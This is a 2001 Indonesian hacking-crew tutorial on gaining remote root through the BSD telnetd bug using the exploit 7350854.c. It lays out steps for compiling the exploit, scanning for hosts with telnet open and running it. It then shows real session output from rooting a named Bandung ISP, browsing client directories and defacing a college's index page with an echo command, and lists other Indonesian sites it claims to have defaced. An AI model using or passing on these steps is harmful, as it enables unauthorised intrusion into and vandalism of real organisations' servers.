Title = Remote root Telnetd * bug found by scut 2001/06/09 further research by smiler, zip, lorian and me. thanks to zip's cool friend for giving me a testbed to play on tested against: BSDI BSD/OS 4.1 NetBSD 1.5 FreeBSD 3.1 FreeBSD 4.0-REL FreeBSD 4.2-REL FreeBSD 4.3-BETA FreeBSD 4.3-STABLE FreeBSD 4.3-RELEASE AUTHOR = JoeGoeL aka CyberRioT of MedanHacking File = Private! only crew Date = 2 Agustus 2001 Credit = TESO TEAM SECURITY Greetz= Cronost,Crafter`13,r3v0lt,dis0rder,Tua-Xiong,Seven_Fly,Breng-Sex,LuVcris, tapuz,Joe-Black,w|p,StripCode,Yourname WOH(VAndal,[RaFa],FonE_TonE,r00t,n0|d,Nu|l) FUCk = INDONESIAN MILITARY sploit = 7350854.c www.hack.co.za Dengan Berhasil nya Nge root www.melsa.net.id suatu provider berlokasi di Bandung,dengan deface situs www.bappeda-bandung.go.id,www.polban.ac.id,www.bankbali-bdg.co.id,www.sidola.com dll yg merupakan client pada ISP tsb mari kita mulai,.,, 1. Pertama kamu dapati Shell Unix ,terserah (Linux,FreeBSD,SCO,SuNos dll) kemudian uploap file 7350854.c dari www.hack.co.za ke shell tsb,kemudian ada kan kompilasi ex. # gcc -o bsd 7350854.c 2. Scan host yg Running varian Bsd spt keterangan di atas 3. scan port dgn tool yg bisa di cari di packetstormsecurity.org cari pscan.c 3. Apbila Port yg terbuka adalah port 23 (telnetd),kemungkinan bisa di ekploitasi untuk root 4. running sploit ex. # ./bsd www.target.com ini contoh yg pernah saya eksploitasi [wbones@dblab Tool]$ ./bsd www.polban.ac.id 7350854 - x86/bsd telnetd remote root by zip, lorian, smiler and scut. check: PASSED, using 16mb mode ############################################################################# ok baby, times are rough, we send 16mb traffic to the remote telnet daemon process, it will spill badly. but then, there is no other way, sorry... ## setting populators to populate heap address space ## number of setenvs (dots / network): 31500 ## number of walks (percentage / cpu): 496140750 ## ## the percentage is more realistic than the dots ;) percent |--------------------------------------------------------| ETA | 99.37% |....................................................... | 00:00:06 | ::tunggu hingga 100% maka akan kelihatan spt : ## sleeping for 10 seconds to let the process recover ## ok, you should now have a root shell ## as always, after hard times, there is a reward... :: tampilan begini, terus tekan enter command: ��% ls -al total 19047 drwxr-xr-x 20 root wheel 512 Jul 31 20:37 . drwxr-xr-x 20 root wheel 512 Jul 31 20:37 .. -rw-r--r-- 2 root wheel 658 Nov 20 2000 .cshrc -rw-r--r-- 2 root wheel 251 Nov 20 2000 .profile -r--r--r-- 1 root wheel 4735 Nov 20 2000 COPYRIGHT drwxr-xr-x 2 root wheel 1024 Jun 20 02:21 bin drwxr-xr-x 3 root wheel 512 Jun 20 02:26 boot drwxr-xr-x 2 root wheel 512 Jun 19 23:57 cdrom lrwx------ 1 root wheel 11 Jul 31 15:58 compat -> /usr/compat drwxr-xr-x 3 root wheel 13824 Jul 31 21:01 dev drwxr-xr-x 2 root wheel 512 Jun 19 23:57 dist drwxr-xr-x 15 root wheel 2560 Aug 1 06:00 etc drwxr-xr-x 3 root wheel 4096 Jul 13 09:17 home -r-xr-xr-x 1 root wheel 2086844 Jul 31 20:37 kernel -r-xr-xr-x 1 root wheel 3258128 Nov 20 2000 kernel.GENERIC -r-xr-xr-x 1 root wheel 2062958 Jun 23 11:24 kernel.old -r-xr-xr-x 1 root wheel 2062958 Jun 23 10:51 kernel.prev drwxr-xr-x 2 root wheel 512 Nov 20 2000 mnt drwxr-xr-x 2 root wheel 3072 Jul 31 20:37 modules drwxr-xr-x 2 root wheel 3072 Jun 20 11:37 modules.old -rw-r--r-- 1 root wheel 91395 Jun 25 11:33 po-mode.el dr-xr-xr-x 1 root wheel 512 Aug 1 06:29 proc -rw------- 1 root wheel 97360 Jul 31 15:59 restoresymtable drwxr-xr-x 5 root wheel 512 Aug 1 05:30 root drwxr-xr-x 2 root wheel 2048 Jun 20 02:24 sbin drwxr-xr-x 4 root wheel 1024 Jun 19 23:57 stand lrwx------ 1 root wheel 11 Jul 31 15:58 sys -> usr/src/sys lrwx------ 1 root wheel 8 Jul 31 15:58 tmp -> /var/tmp drwxr-xr-x 14 root wheel 512 Jun 28 17:41 usr drwxr-xr-x 4 root wheel 512 Jun 22 10:22 usr2 drwxr-xr-x 4 root wheel 512 Jun 26 11:30 usr3 drwxr-xr-x 18 root wheel 512 Jun 20 00:22 var :: kita berhasil!!!!!!!!!! who am i root tty?? Aug 1 06:29 uname -a FreeBSD www3.melsa.net.id 4.3-STABLE FreeBSD 4.3-STABLE #4: Tue Jul 31 20:36:18 JAVT 2001 root@www3.melsa.net.id:/usr/src/sys/compile/WWW3 i386 :: dapat Box root shell :: cari Index.html nya biasa ya di di direktori home/www cd home ls -al total 12 drwxr-xr-x 3 root wheel 4096 Jul 13 09:17 . drwxr-xr-x 20 root wheel 512 Jul 31 20:37 .. lrwx------ 1 root wheel 16 Jul 31 15:58 abadi -> /usr2/home/abadi lrwx------ 1 root wheel 25 Jul 31 15:58 accounting.csb -> /usr3/home/accounting.csb lrwx------ 1 root wheel 18 Jul 31 15:59 adm.csb -> /usr3/home/adm.csb lrwx------ 1 root wheel 16 Jul 31 15:58 admin -> /usr2/home/admin lrwx------ 1 root wheel 22 Jul 31 15:58 admin.iklan -> /usr3/home/admin.iklan lrwx------ 1 root wheel 26 Jul 31 15:58 akunting.bpromo -> /usr3/home/akunting.bpromo lrwx------ 1 root wheel 26 Jul 31 15:59 al_reda.gemafia -> /usr3/home/al_reda.gemafia lrwx------ 1 root wheel 18 Jul 31 15:59 animbus -> /usr2/home/animbus lrwx------ 1 root wheel 17 Jul 31 15:59 anzana -> /usr2/home/anzana lrwx------ 1 root wheel 20 Jul 31 15:59 apep.reka -> /usr3/home/apep.reka lrwx------ 1 root wheel 19 Jul 31 15:59 aprotech -> /usr2/home/aprotech lrwx------ 1 root wheel 15 Jul 31 15:59 aris -> /usr2/home/aris lrwx------ 1 root wheel 23 Jul 31 15:59 artforum.bae -> /usr3/home/artforum.bae lrwx------ 1 root wheel 20 Jul 31 15:59 askhaindo -> /usr2/home/askhaindo lrwx------ 1 root wheel 14 Jul 31 15:59 bae -> /usr2/home/bae lrwx------ 1 root wheel 22 Jul 31 15:59 baligarment -> /usr2/home/baligarment lrwx------ 1 root wheel 23 Jul 31 15:59 bankbali-bdg -> /usr2/home/bankbali-bdg lrwx------ 1 root wheel 18 Jul 31 15:59 bappeda -> /usr2/home/bappeda lrwx------ 1 root wheel 17 Jul 31 15:59 bening -> /usr2/home/bening lrwx------ 1 root wheel 24 Jul 31 15:59 benny.bethany -> /usr3/home/benny.bethany lrwx------ 1 root wheel 21 Jul 31 15:59 bethanydoa -> /usr2/home/bethanydoa lrwx------ 1 root wheel 22 Jul 31 15:59 bhima.topaz -> /usr3/home/bhima.topaz lrwx------ 1 root wheel 15 Jul 31 15:59 bhtv -> /usr2/home/bhtv lrwx------ 1 root wheel 26 Jul 31 15:59 bidang3.bappeda -> /usr3/home/bidang3.bappeda lrwx------ 1 root wheel 26 Jul 31 15:59 bidang5.bappeda -> /usr3/home/bidang5.bappeda lrwx------ 1 root wheel 18 Jul 31 15:59 bigfash -> /usr2/home/bigfash lrwx------ 1 root wheel 15 Jul 31 15:59 bita -> /usr2/home/bita lrwx------ 1 root wheel 18 Jul 31 15:59 bowling -> /usr2/home/bowling lrwx------ 1 root wheel 19 Jul 31 15:59 boy.reka -> /usr3/home/boy.reka lrwx------ 1 root wheel 17 Jul 31 15:59 bpromo -> /usr2/home/bpromo lrwx------ 1 root wheel 23 Jul 31 15:59 bptc.bethany -> /usr3/home/bptc.bethany lrwx------ 1 root wheel 19 Jul 31 15:59 bratatex -> /usr2/home/bratatex lrwx------ 1 root wheel 22 Jul 31 15:59 budi.weaver -> /usr3/home/budi.weaver lrwx------ 1 root wheel 26 Jul 31 15:59 buletin.bethany -> /usr3/home/buletin.bethany lrwx------ 1 root wheel 17 Jul 31 15:59 busana -> /usr2/home/busana lrwx------ 1 root wheel 18 Jul 31 15:59 cci-bdg -> /usr2/home/cci-bdg lrwx------ 1 root wheel 15 Jul 31 15:59 cela -> /usr2/hom :: lihat ada polban,bappeda,bankbali-bdg,bethanydoa dll yg merupakan websites :: Kemudian pindah ke direktori polban cd polban cd webpages ls -al total 34 drwxr-xr-x 10 polban corp 512 Aug 1 04:43 . drwxr-xr-x 4 polban corp 512 May 22 2000 .. drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _borders drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _derived drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _fpclass drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _overlay drwxr-xr-x 2 polban corp 512 Jun 21 15:16 _private drwxr-xr-x 3 polban corp 512 Jun 21 15:18 _themes drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _vti_pvt drwxr-xr-x 2 polban corp 512 Jun 21 15:17 images -rw-r--r-- 1 root corp 75 Aug 1 04:43 index.html -rw-r--r-- 1 polban corp 992 Jun 21 15:18 index.old -rw-r--r-- 1 root corp 167 Aug 1 04:00 medan.htm -rw-r--r-- 1 root corp 70 Aug 1 03:45 read.htm -rw-r--r-- 1 root corp 77 Aug 1 03:47 surat.htm -rw-r--r-- 1 root corp 117 Aug 1 03:54 warna.htm -rw-r--r-- 1 root corp 18 Aug 1 03:52 yoyo :: ternyata index nya terletak di sini.... :: ada kan deface :)) LoL heheheheh Babi kaw wepe jgn kaw ganggu nancy ku!!!(sedikit peringatan buat yg sering usil ) ::: ayo kita deface!!!!!!!! echo " JoeGoeL,Cronost,Crafter`13,r3v0lt,Tua-Xiong and dis0rder own U poltek Bandung Find Us at Medanhacking on Irc.dal.net greetz All Medanhacking Crew " > index.html :: selesai !!! buka www.polban.ac.id ,akan spt yg diatas :: di bawah ini yg kena saya deface :: Balik Ke Shell Kita tekan Ctrl+C [wbones@dblab Tool]$ www.bappeda-bandung.go.id www.bankbali-bdg.co.id www.polban.ac.id http://www.netweaver.web.id/ http://www.priokport.co.id/ www.rdb.or.id/ www.pltp-kamojang.co.id/ www.mbt-kons.co.id/ http://www.metamasa.com/ http://www.ultima.co.id/ http://www.p5d.or.id/ http://www.quasar.co.id/ http://www.bae.or.id/ http://www.bita.co.id/ http://www.mbt-kons.co.id/ http://www.mkn.co.id/ http://www.situsfoto.com/ ::: Ok see Ya Viva MedanHacking Crew find it htpp://medanhacking.has.it ::: Buat Romi aka Seven_Fly gimana Buku Linux dan Perl nya? udah belom sampai nya ::: Buat dis0rder tolong transfer ke bhs Inggris dan ibrani!!!!!!!!!!!! Copyright JoeGoeL aka CyberRioT, CyberRioT@apexmail.com 2001 sampai Jumpa di Tutor lain nya!!!!!
0 Responses to “Remote root Telnetd”